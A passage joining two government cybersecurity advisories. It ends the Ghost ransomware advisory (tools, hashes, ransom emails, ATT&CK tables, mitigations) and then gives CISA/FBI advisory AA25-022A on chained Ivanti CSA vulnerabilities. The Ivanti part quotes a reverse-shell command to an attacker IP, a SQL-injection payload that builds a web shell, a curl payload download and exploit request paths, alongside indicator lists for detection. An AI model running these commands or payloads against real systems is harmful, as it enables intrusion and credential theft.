IP address enumeration. github[.]com/BronzeTicket/SharpNBTScan BadPotato.exe BadPotato.exe is an exploitation tool used for privilege escalation. github[.]com/BeichenDream/BadPotato God.exe God.exe is a compiled version of GodPotato and is used for privilege escalation. github[.]com/BeichenDream/GodPotato HFS (HTTP File Server) A portable web server program that Ghost actors use to host files for remote access and exfiltration. rejitto[.]com/hfs Ladon 911 A multifunctional scanning and exploitation tool, often used by Ghost actors with the MS17010 option to scan for SMB vulnerabilities associated with CVE-2017-0143 and CVE-2017-0144. github[.]com/k8gege/Ladon Web Shell A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access. Slight variation of github[.]com/BeichenDream/Chunk-Proxy/blob/main/proxy.aspx Table 2: MD5 File Hashes Associated with Ghost Ransomware Activity File name MD5 File Hash Cring.exe c5d712f82d5d37bb284acd4468ab3533 Ghost.exe 34b3009590ec2d361f07cac320671410 d9c019182d88290e5489cdf3b607f982 ElysiumO.exe 29e44e8994197bdb0c2be6fc5dfc15c2 c9e35b5c1dc8856da25965b385a26ec4 d1c5e7b8e937625891707f8b4b594314 Locker.exe ef6a213f59f3fbee2894bd6734bbaed2 iex.txt, pro.txt (IOX) ac58a214ce7deb3a578c10b97f93d9c3 x86.log (IOX) c3b8f6d102393b4542e9f951c9435255 0a5c4ad3ec240fbfd00bdc1d36bd54eb sp.txt (IOX) ff52fdf84448277b1bc121f592f753c5 main.txt (IOX) a2fd181f57548c215ac6891d000ec6b9 isx.txt (IOX) 625bd7275e1892eac50a22f8b4a6355d sock.txt (IOX) db38ef2e3d4d8cb785df48f458b35090 Ransom Email Addresses Table 3 is a subset of ransom email addresses that have been included in Ghost ransom notes. Table 3: Ransom Email Addresses Email Addresses asauribe@tutanota.com ghostbackup@skiff.com rainbowforever@tutanota.com cringghost@skiff.com ghosts1337@skiff.com retryit1998@mailfence.com crptbackup@skiff.com ghosts1337@tuta.io retryit1998@tutamail.com d3crypt@onionmail.org ghostsbackup@skiff.com rsacrpthelp@skiff.com d3svc@tuta.io hsharada@skiff.com rsahelp@protonmail.com eternalnightmare@tutanota.com just4money@tutanota.com sdghost@onionmail.org evilcorp@skiff.com kellyreiff@tutanota.com shadowghost@skiff.com fileunlock@onionmail.org kev1npt@tuta.io shadowghosts@tutanota.com fortihooks@protonmail.com lockhelp1998@skiff.com summerkiller@mailfence.com genesis1337@tutanota.com r.heisler@skiff.com summerkiller@tutanota.com ghost1998@tutamail.com rainbowforever@skiff.com webroothooks@tutanota.com Ransom Notes Starting approximately in August 2024, Ghost actors began using TOX IDs in ransom notes as an alternative method for communicating with victims. For example: EFE31926F41889DBF6588F27A2EC3A2D7DEF7D2E9E0A1DEFD39B976A49C11F0E19E03998DBDA and E83CD54EAAB0F31040D855E1ED993E2AC92652FF8E8742D3901580339D135C6EBCD71002885B. MITRE ATT&CK Tactics and Techniques See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, version 16.1, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 4: Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 Ghost actors exploit multiple vulnerabilities in public-facing systems to gain initial access to servers. Table 5: Execution Technique Title ID Use Windows Management Instrumentation T1047 Ghost actors abuse WMI to run PowerShell scripts on other devices, resulting in their infection with Cobalt Strike Beacon malware. PowerShell T1059.001 Ghost actors use PowerShell for various functions including to deploy Cobalt Strike. Windows Command Shell T1059.003 Ghost actors use the Windows Command Shell to download malicious content on to victim servers. Table 6: Persistence Technique Title ID Use Account Manipulation T1098 Ghost actors change passwords for already established accounts. Local Account T1136.001 Ghost actors create new accounts or makes modifications to local accounts. Domain Account T1136.002 Ghost actors create new accounts or makes modifications to domain accounts. Web Shell T1505.003 Ghost actors upload web shells to victim servers to gain access and for persistence. Table 7: Privilege Escalation Technique Title ID Use Exploitation for Privilege Escalation T1068 Ghost actors use a suite of open source tools in an attempt to gain elevated privileges through exploitation of vulnerabilities. Token Impersonation/Theft T1134.001 Ghost actors use Cobalt Strike to steal process tokens of processes running at a higher privilege. Table 8: Defense Evasion Technique Title ID Use Application Layer Protocol: Web Protocols T1071.001 Ghost actors use HTTP and HTTPS protocols while conducting C2 operations. Impair Defenses: Disable or Modify Tools T1562.001 Ghost actors disable antivirus products. Hidden Window T1564.003 Ghost actors use PowerShell to conceal malicious content within legitimate appearing command windows. Table 9: Credential Access Technique Title ID Use OS Credential Dumping T1003 Ghost actors use Mimikatz and the Cobalt Strike “hashdump” command to collect passwords and password hashes. Table 10: Discovery Technique Title ID Use Remote System Discovery T1018 Ghost actors use tools like Ladon 911 and ShapNBTScan for remote systems discovery. Process Discovery T1057 Ghost actors run a ps command to list running processes on an infected device. Domain Account Discovery T1087.002 Ghost actors run commands such as net group “Domain Admins” /domain to discover a list of domain administrator accounts. Network Share Discovery T1135 Ghost actors use various tools for network share discovery for the purpose of host enumeration. Software Discovery T1518 Ghost actors use their access to determine which antivirus software is running. Security Software Discovery T1518.001 Ghost actors run Cobalt Strike to enumerate running antivirus software. Table 11: Exfiltration Technique Title ID Use Exfiltration Over C2 Channel T1041 Ghost actors use both web shells and Cobalt Strike to exfiltrate limited data. Exfiltration to Cloud Storage T1567.002 Ghost actors sometimes use legitimate cloud storage providers such as Mega.nz for malicious exfiltration operations. Table 12: Command and Control Technique Title ID Use Web Protocols T1071.001 Ghost actors use Cobalt Strike Beacon malware and Cobalt Strike Team Servers which communicate over HTTP and HTTPS. Ingress Tool Transfer T1105 Ghost actors use Cobalt Strike Beacon malware to deliver ransomware payloads to victim servers. Standard Encoding T1132.001 Ghost actors use PowerShell commands to encode network traffic which reduces their likelihood of being detected during lateral movement. Encrypted Channel T1573 Ghost actors use encrypted email platforms to facilitate communications. Table 13: Impact Technique Title ID Use Data Encrypted for Impact T1486 Ghost actors use ransomware variants Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe to encrypt victim files for ransom. Inhibit System Recovery T1490 Ghost actors delete volume shadow copies. Mitigations The FBI, CISA, and MS-ISAC recommend organizations reference their #StopRansomware Guide and implement the mitigations below to improve cybersecurity posture on the basis of the Ghost ransomware activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections. Maintain regular system backups that are known-good and stored offline or are segmented from source systems [CPG 2.R]. Ghost ransomware victims whose backups were unaffected by the ransomware attack were often able to restore operations without needing to contact Ghost actors or pay a ransom. Patch known vulnerabilities by applying timely security updates to operating systems, software, and firmware within a risk-informed timeframe [CPG 1.E]. Segment networks to restrict lateral movement from initial infected devices and other devices in the same organization [CPG 2.F]. Require Phishing-Resistant MFA for access to all privileged accounts and email services accounts. Train users to recognize phishing attempts. Monitor for unauthorized use of PowerShell. Ghost actors leverage PowerShell for malicious purposes, although it is often a helpful tool that is used by administrators and defenders to manage system resources. For more information, visit NSA and CISA’s joint guidance on PowerShell best practices. Implement the principle of least privilege when granting permissions so that employees who require access to PowerShell are aligned with organizational business requirements. Implement allowlisting for applications, scripts, and network traffic to prevent unauthorized execution and access [CPG 3.A]. Identify, alert on, and investigate abnormal network activity. Ransomware activity generates unusual network traffic across all phases of the attack chain. This includes running scans to discover other network connected devices, running commands to list, add, or alter administrator accounts, using PowerShell to download and execute remote programs, and running scripts not usually seen on a network. Organizations that can successfully identify and investigate this activity are better able to interrupt malicious activity before ransomware is executed [CPG 3.A]. Ghost actors run a significant number of commands, scripts, and programs that IT administrators would have no legitimate reason for running. Victims who have identified and responded to this unusual behavior have successfully prevented Ghost ransomware attacks. Limit exposure of services by disabling unused ports such as, RDP 3398, FTP 21, and SMB 445, and restricting access to essential services through securely configured VPNs or firewalls. Enhance email security by implementing advanced filtering, blocking malicious attachments, and enabling DMARC, DKIM, and SPF to prevent spoofing [CPG 2.M]. Validate Security Controls In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 3 to Table 13). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. Reporting Your organization has no obligation to respond or provide information back to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws. The FBI is interested in any information that can be shared, to include logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, and/or decryptor files. Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, date of infection, date detected, initial attack vector, and host and network-based indicators. The FBI, CISA, and MS-ISAC do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472). Disclaimer The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and the MS-ISAC. Version History February 19, 2025: Initial version.
Note: The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti’s Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE -2025-0282 and CVE-2025-0283, see Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways. Summary The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities. According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers. All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[1] Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA. Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory. Download the PDF version of this report: AA25-022A Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications (PDF, 755.77 KB ) For a downloadable copy of IOCs, see: AA25-022A STIX XML (XML, 102.32 KB ) AA25-022A STIX JSON (JSON, 74.72 KB ) Technical Details Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and CVE-2024-8963.[2][3] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[1] CVE-2024-8963 [CWE-22: Path Traversal] is an administrate bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [CWE-78: OS Command Injection], threat actors can remotely authenticate into a victims’ network and execute arbitrary commands on the appliance [T1219].[2][3] CVE-2024-9379 [CWE-89: SQL Injection] allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.[1] CVE-2024-9380 [CWE-77: Command Injection] allows a remote authenticated attacker with admin privileges to obtain RCE.[1] According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[4] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its Known Exploited Vulnerabilities (KEV) Catalog. According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim—other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures. Exploit Chain 1 The threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a nobody user [T1564.002], the threat actors first sent a GET request to datetime.php to acquire session and cross-site request forgery (CSRF) tokens using GET /client/index.php%3F.php/gsb/datetime[.]php [T1071.001]. They followed this in quick succession with a POST request to the same endpoint, using the TIMEZONE input field to manipulate the setSystemTimeZone function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [T1552.001]. Note: The actors used multiple script variations. See Appendix A for examples of encoded and decoded scripts. In some cases, the threat actors exfiltrated the encrypted admin credentials then decrypted them offline [TA0010]. In other cases, the threat actors leveraged an executable matching the regular expression php\w{6} located in the /tmp directory to decrypt the credentials prior to exfiltration—this tool was unrecoverable. After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher privileged account. The actors successfully sent a GET request to /gsb/reports[.]php. They immediately followed this with a POST request using the TW_ID input field to execute code to implant webshells for persistence [T1505.003]. In one confirmed compromise, the threat actors tried to create webshells using two different paths: echo "/opt/ivanti/csa/broker/webroot/client/help.php echo " /opt/landesk/broker/webroot/gsb/help.php In the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel: bash -i >&/dev/tcp/107.173.89[.]16/8000 0>&1. In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used sudo commands to disable the vulnerability in DateTimeTab.php, modify and remove webshells, and remove evidence of exploitation [T1548.003]. See Appendix B for the list of sudo commands used. Lateral Movement In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [T1068]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [T1595.002]. Exploit Chain 2 In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using GET /client/index.php%3f.php/gsb/broker.php for initial access. After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed GET and POST requests in quick succession to /client/index.php%3F.php/gsb/broker.php. In the POST body, threat actors entered the following string in the lockout attempts input box: LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES ('''echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>/.k''', NOW(), 10). The first portion of the command (LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [T1190], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the user_info table. After inserting valid bash code as a user in the user_info table, the threat actors attempted to login as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>./k as if it were code. The threat actors repeated the process of echo commands until they built a valid web shell [T1059]. However, there were no observations that the threat actors were successful. Detection of Activity According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions. Victim Organization 1 The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement. Victim Organization 2 This organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed base64 encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement. Victim Organization 3 This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity. Indicators of Compromise See Table 1 through Table 3 for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA. Disclaimer: Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors. Table 1: IP Address Used for Credential Theft, September 2024 File Name IP Address Description "/client/index.php%3f.php/gsb/datetime.php 142.171.217[.]195 /var/log/messages "/client/index.php%3f.php/gsb/datetime.php 154.64.226[.]166 /var/log/messages-20240904.gz "/client/index.php%3f.php/gsb/datetime.php 216.131.75[.]53 "/client/index.php%3f.php/gsb/datetime.php 23.236.66[.]97 /var/log/messages-20240905.gz "/client/index.php%3f.php/gsb/datetime.php 38.207.159[.]76 /var/log/messages-20240906.gz Table 2: Survey 2, Ivanti CSA Network IOC List, September 2024 File Name IP Address Description 149.154.167[.]41 95.161.76[.]100 hxxps://file.io/E50vtqmJP5aa hxxps://file.io/RBKuU8gicWt hxxps://file.io/frdZ9L18R7Nx hxxp://ip.sb hxxps://pan.xj.hk/d/ 6401646e701f5f47518ecef48a308a36/redis 142.171.217[.]195 108.174.199[.]200 206.189.156[.]69 108.174.199[.]200/Xa27efd2.tmp 142.171.217[.]195 Table 3: Additional IOCs Derived from Incident Response, September 2024 Type IOC Description Ipv4 107.173.89[.]16 Ipv4 38.207.159[.]76 Ipv4 142.171.217[.]195 Ipv4 154.64.226[.]166 Ipv4 156.234.193[.]18 Ipv4 216.131.75[.]53 Ipv4 205.169.39[.]11 Ipv4 23.236.66[.]97 Ipv4 149.154.176[.]41 Ipv4 95.161.76[.]100 Ipv4 142.171.217[.]195 Ipv4 108.174.199[.]200 Ipv4 206.189.156[.]69 Ipv4 142.171.217[.]195 Ipv4 67.217.228[.]83 Ipv4 203.160.72[.]174 Ipv4 142.11.217[.]3 Ipv4 104.168.133[.]228 Ipv4 64.176.49[.]160 Ipv4 45.141.215[.]17 Ipv4 142.171.217[.]195 Ipv4 98.101.25[.]30 Ipv4 216.131.75[.]53 Ipv4 134.195.90[.]71 Ipv4 23.236.66[.]97 Hash a50660fb31df96b3328640fdfbeea755 Hash 53c5b7d124f13039eb62409e1ec2089d Hash 698a752ec1ca43237cb1dc791700afde Hash aa69300617faab4eb39b789ebfeb5abe Hash c2becc553b96ba27d60265d07ec3bd6c Hash cacc30e2a5b2683e19e45dc4f191cebc /opt/ivanti/csa/broker/webroot/client/help.php Hash 061e5946c9595e560d64d5a8c65be49e /opt/landesk/broker/webroot/gsb/view.php Hash e35cf026057a3729387b7ecfb213ae 62a611f0f1a418876b11c9df3b56885bed /tmp/brokerdebug Hash c7d20ca6fe596009afaeb725fec8635f /opt/landesk/broker/webroot/gsb/help.php Hash F7F81AE880A17975F60E1E0FE1A4048B /opt/landesk/broker/webroot/gsb/DateTimeTab.php Hash 86B62FFD33597FD635E01B95F08BB996 /opt/landesk/broker/webroot/gsb/style.php Hash DD975310201079CACD4CDE6FACAB8C1D /opt/landesk/broker/webroot/client/index.php Hash 1B20E9310CA815F9E2BD366FB94E147F /sbin/systemd Configuration file at /WpService.conf Hash 30f57e14596f1bcad7cc4284d1af4684 /sbin/systemd Configuration file at /WpService.conf URL hxxps://file.io/E50vtqmJP5aa URL hxxps://file.io/RBKuU8gicWt URL hxxps://file.io/frdZ9L18R7Nx URL hxxp://ip.sb URL hxxps://pan.xj.hk/d/ 6401646e701f5f47518ecef48a308a36/redis URL 108.174.199.200/Xa27efd2.tmp URL 45.33.101.53/log URL 45.33.101.53/log2 URL cri07nnrg958pkh6qhk0977u8c83jog6t.oast[.]fun URL cri07nnrg958pkh6qhk0yrgy1e76p1od6.oast[.]fun domain gg.oyr2ohrm.eyes[.]sh domain ggg.oyr2ohrm.eyes[.]sh domain gggg.oyr2ohrm.eyes[.]sh domain txt.xj[.]hk domain book.hacktricks[.]xyz host sh -c setsid /dev/shm/redis & host sh -c curl -k https://file[.]io/1zqvMYY1dpkk -o /dev/shm/redis2 host sh -c mv /dev/shm/redis2 /dev/shm/redis host sh -c rm /dev/shm/* host rm /dev/shm/PostgreSQL.1014868572 /dev/shm/redis host 78cc672218949a9ec87407ad3bcb5db6 Agent.zip host d13f71e51b38ffef6b9dc8efbed27615 Log.log host d88bfac2b43509abdc70308bef75e2a6 Log.exe host R.exe (MD5: 60d5648d35bacf5c7aa713b2a0d267d3) R.exe host ae51c891d2e895b5ca919d14edd42c26 CAService.exe host d88bfac2b43509abdc70308bef75e2a6 Lgfxsys.exe host f82847bccb621e6822a3947bc9ce9621 NetlO.cfg host c894f55c8fa9d92e2dd2c78172cff745 XboVFyKw.tmp host MD5: Unknown Wi.bat host MD5: Unknown dCUgGXfm.tmp host MD5: Unknown DijZViHC.tmp /var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/ln -sf /var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/mv /tmp/php.ini /etc/php.ini /var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/sbin/hwclock --localtime --systohc /var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/backuptool --fullList Ipv4 142.171.217[.]195 Ipv4 107.173.89[.]16 Ipv4 192.42.116[.]210 Ipv4 82.197.182[.]161 Ipv4 154.213.185[.]230 Ipv4 216.131.75[.]53 Ipv4 23.236.66[.]97 Ipv4 208.105.190[.]170 Ipv4 136.144.17[.]145 Ipv4 136.144.17[.]133 Ipv4 216.73.162[.]56 Ipv4 104.28.240[.]123 Ipv4 163.5.171[.]49 Ipv4 89.187.178[.]179 Ipv4 163.5.171[.]49 Ipv4 203.160.86[.]69 Ipv4 185.220.69[.]83 Ipv4 185.199.103[.]196 Ipv4 188.172.229[.]15 Ipv4 155.138.215[.]144 Ipv4 64.176.49[.]160 Ipv4 185.40.4[.]38 Ipv4 216.131[.]75.53 Ipv4 185.40.4[.]95 MITRE ATT&CK Tactics and Techniques See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 4: Reconnaissance Technique Title ID Use Active Scanning: Vulnerability Scanning T1595.002 Threat actors performed reconnaissance by using Obelisk and GoGo to scan for vulnerabilities. Table 5: Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 Threat actors leveraged weaknesses in applications that are not properly handled to compromise network device protocols, perform SQL injections, and generally exploit applications. Table 6: Execution Technique Title ID Use Command and Scripting Interpreter T1059 Threat actors abused command and script interpreters to execute commands, scripts, or binaries. Table 7: Persistence Technique Title ID Use Modify Authentication Process T1556 Threat actors executed an authentication bypass by exploiting the authentication mechanisms of a device to gain access to organizations’ networks. Server Software Component: Web Shell T1505.003 Threat actors executed code to implant webshells for persistence. Table 8: Privilege Escalation Technique Title ID Use Exploitation for Privilege Escalation T1068 Threat actors leveraged weaknesses to gain access via an outdated, vulnerable version of a server. Table 9: Defense Evasion Technique Title ID Use Hide Artifacts: Hidden Users T1564.002 Threat actors acted as a hidden user to disguise their presence on a system. Deobfuscate/Decode Files or Information T1140 Threat actors decrypted credentials prior to exfiltration by leveraging native tools located in the extracted backup file. Abuse Elevation Control Mechanism: Sudo and Sudo Caching T1548.003 Threat actors used sudo commands to disable vulnerabilities, modify and remove webshells, and remove evidence of exploitation. Table 10: Credential Access Technique Title ID Use Unsecured Credentials: Credentials in Files T1552.001 Threat actors harvested encrypted admin credentials to gain further access. Table 11: Lateral Movement Technique Title ID Use Exploitation of Remove Services T1210 Threat actors exploited CSAs via remote services to gain access to an organization’s networks by leveraging programming errors, EOL systems, and operating systems. Table 12: Command and Control Technique Title ID Use Remote Access Software T1219 Threat actors attempted to remotely authenticate into a victim’s network and execute arbitrary commands on the appliance. Application Layer: Web Protocol T1071.001 Threat actors used tools such as GET or POST requests to acquire session and CSRF tokens. Table 13: Exfiltration Technique Title ID Use Exfiltration TA0010 Threat actors exfiltrated encrypted admin credentials or other encrypted data for future use. Incident Response If compromise is detected, the authoring agencies recommend that organizations: Quarantine or take offline potentially affected hosts. Reimage compromised hosts. Provision new account credentials. For Ivanti hosts with Active Directory (AD) access, threat actors can trivially export active domain administrator credentials during initial compromise. Until there is evidence to the contrary, it is assumed that AD access on compromised systems is connected to external authentication systems such as Lightweight Directory Access Protocol and AD. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections. Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). Mitigations CISA and FBI recommend organizations: Upgrade to the latest supported version of Ivanti CSA immediately for continued support.[3] Please note that Ivanti CSA 4.6 is EOL and no longer receives patches or third-party libraries. Customers must upgrade to the latest version of the product for continued support. Install endpoint detection and response (EDR) on the system to alert network defenders on unusual and potentially malicious activity. Establish a baseline and maintain detailed logs of network traffic, account behavior, and software. This can assist network defenders in identifying anomalies that may indicate malicious activity more quickly. Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Secure remote access tools by: Implementing application controls to manage and control software execution, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation. Strictly limit the use of remote desktop protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]: Audit the network for systems using RDP. Close unused RDP ports. Enforce account lockouts after a specified number of attempts. Apply phishing-resistant multifactor authentication (MFA). Log RDP login attempts. Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec. Follow best cybersecurity practices in your production and enterprise environments,including mandating phishing-resistant multifactor authentication (MFA) for all staff and services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures. Because the CPGs are a subset of best practices, CISA and FBI also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF). Validate Security Controls In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 4 through Table 13). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. References Ivanti: Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381) Ivanti: Security Advisory Ivanti Cloud Service Appliance (CSA) (CVE-2024-8190) Ivanti: Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE-2024-8963) Fortinet: Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA Contact Information Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to: CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. Disclaimer The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI. Version History January 22, 2025: Initial version. January 31, 2025: Removed IOCs. Appendix A: Encoded and Decoded Scripts Decoded Python Scripts 